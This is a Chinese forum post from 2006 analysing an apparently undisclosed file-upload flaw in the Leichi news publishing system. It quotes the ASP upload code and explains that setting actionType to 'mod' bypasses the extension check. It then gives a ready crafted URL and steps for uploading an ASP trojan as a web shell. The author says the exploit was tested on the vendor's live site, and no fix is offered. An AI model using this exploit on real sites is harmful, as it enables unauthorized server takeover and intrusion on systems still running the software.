服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4736|回复: 0

雷驰新闻发布管理系统漏洞分析

[复制链接]
zgldragon 发表于 2006-6-21 16:59:46 | 显示全部楼层 |阅读模式
声明:漏洞为focn[BCT]首先发现,而且还没有公布!最近在学ASP所以拿来分析了下写出来了!
版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!
本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任!


系统:版本: 当前任何版本
漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可
                以 访问到此文件。任意用户都可以使用此文件上传文件到服务器
              2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码!

          if file.FileSize>0 then       ''如果 FileSize > 0 说明有文件数据
            '生成图片名字
            if actionType= "mod" then
              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
            else
              if editRemNum<>"" then                
                remNum = editRemNum
              else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
              end if
              remFileName = remNum&"_"&(editImageNum+1)&".gif"
            end if
           
            file.SaveAs Server.mappath(formPath&remFileName)   ''保存文件
             
%>


关键的是 if actionType= "mod" then
              remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件
构造如下UPL
http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
然后在上传文件里面填要传的图片格式的ASP木马
就可以在uppic目录下上传文件名为test.asp的文件

本方法在雷驰官方网站上测试通过!·
再次希望大家不要用于非法用途!!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-30 03:23 , Processed in 0.142344 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表